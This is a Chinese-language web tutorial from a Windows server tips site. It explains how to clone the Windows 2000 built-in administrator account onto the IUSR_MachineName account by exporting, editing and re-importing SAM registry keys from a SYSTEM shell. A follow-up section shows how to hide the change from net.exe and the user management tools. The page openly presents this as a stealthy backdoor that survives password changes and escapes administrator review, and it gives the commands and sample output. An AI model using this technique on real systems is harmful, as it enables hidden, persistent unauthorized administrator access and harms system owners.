当前位置: 首页 > 图文教程 > 服务器 > Windows服务器 > 克隆windows 2000管理员帐号

Windows服务器
Windows 2000系统Ping不通 缓存在作怪
Windows 2000中如何突破注册表容量限制
浅析Windows 2000系统中的关机技巧
Windows 2000/XP安装驱动的兼容问题
在Windows 2000系统下共享ADSL的办法
时尚 让Win2k也用上XP绚丽主题
领先在起点—Win 2000操作系统的启动优化
Windows 2000 Server系统帐号安全设置技巧
轻松给Windows 2000搭建邮件服务器
让你的Windows 2000安全些,再安全些
详述Windows 2000日志及其删除方法
轻松取消Windows 2000默认共享
浅析Windows 2000操作系统中的关机技巧
更改Windows 2000系统收藏夹位置的方法
Windows操作系统的十则高级应用技巧
关于windows 2000各种服务的简要说明
Windows 2000操作系统内存优化全攻略
让Windows 2000服务运行得更好
Windows 2000操作技巧完全手册(上)
Windows 2000操作技巧完全手册(下)

Windows服务器 中的 克隆windows 2000管理员帐号


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-11-01   浏览: 35 ::
收藏到网摘: n/a

  首先要让大家知道的概念是在Windows 2000和Windows NT里,默认管理员帐号的SID是固定的500(0x1f4),那么我们可以用机器里已经存在的一个帐号将SID为500的帐号进行克隆,在这里我们选择的帐号是IUSR_MachineName(当然,为了加强隐蔽性,我们选择了这个帐号,所有用户都可以用以下的方法,只不过这个用户较常见罢了),测试环境为Windows 2000 Server。

  运行一个System的CMD Shell( http://www.sometips.com/tips/scripts/173.htm 或使用 Http://www.sometips.com/soft/psu.exe),然后在该CMD Shell里面运行 regedit /e adam.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 这样我们将SID 为500的管理员帐号的相关信息导出,然后编辑adam.reg文件,将adam.reg文件的第三行-[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]最后的'1F4'修改为IUSR_MachineName的SID(大部分的机器该用户的SID都为0x3E9,如果机器在最初安装的时候没有安装IIS,而自己创建了帐号后再安装IIS就有可能不是这个值),将Root.reg文件中的'1F4'修改为'3E9'后执行 regedit /s adam.reg 导入该Reg文件

  然后运行

  net user IUSR_MachineName Sometips

  修改IUSR_MachineName的密码(最好使用14位的密码,越像IUSR_MachineName的密码越好)

  OK,大功告成...

  这样,我们拥有和默认管理员一样的桌面、一样的Profile.....

  而且,当我们运行 net localgroup administrators 时,看看结果:

  C:\>net localgroup administrators

  Alias name administrators

  Comment Administrators have complete and unrestricted access to the computer/domain

  Members

  ------------------------------------------------------------------------------

  Administrator

  The command completed successfully.

  再看看USER2SID的输出结果:

  C:\>user2sid Administrator

  S-1-5-21-1004336348-1078145449-854245398-500

  Number of subauthorities is 5

  Domain is IDONTKNOW

  Length of SID in memory is 28 bytes

  Type of SID is SidTypeUser

  C:\>user2sid iusr_machinename

  S-1-5-21-1004336348-1078145449-854245398-1001

  Number of subauthorities is 5

  Domain is IDONTKNOW

  Length of SID in memory is 28 bytes

  Type of SID is SidTypeUser   
  我想,再高明的管理员也看不到任何的异状了...而且,随便管理员改成什么密码,我照样可以用IUSR_MachineName,密码为Sometips登陆...(没有哪位大侠级的管理员喜欢经常修改IUSR_MachineName为其他的名字吧)

  ^_^,这算不算RootKit...

  附:

  1、感谢叮叮付出需要reinstall OS的代价...

  2、任何用以上方法进行试验所导致的系统无法使用均与偶无关,偶均不提供技术支持...

  -----------------------------------------------------------------------------

  叮叮 的补充完善

  很多人提到使用了管理工具的用户管理后,能够发现IUSR_MachineName被提升了权限。

  现给出解决办法。

  方法同上,不过这次修改内容多一些。即

  这次要导出两个key内容:

  一个是adam提到的

  regedit /e adam.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4

  然后另外一个是你需要修改那个账号的值

  regedit /e iusr.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003E9

  然后按照adam提到的修改adam.reg

  “将adam.reg文件的第三行--[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]最后的'1F4'修改为IUSR_MachineName的SID”

  现在,你还要从iusr.reg文件中复制一下内容

  就是将iusr.reg文件中“'V'=hex:0”开始一直到iusr.reg文件结束部分复制下来

  然后替换掉adam.reg中同样位置的部分

  最后使用

  regedit /s adam.reg

  导入该Reg文件

  呵呵,别忘了给这个IUSR_MachineName改密码哦。

  hehe,ok,大功告成。

  现在IUSR_MachineName账号拥有了管理员的权限,但是你使用net.exe和

  管理工具中的用户管理都将看不到任何痕迹,即使你去察看所属于的组和用户。

  都和修改前没有任何区别。

  好了,补充结束。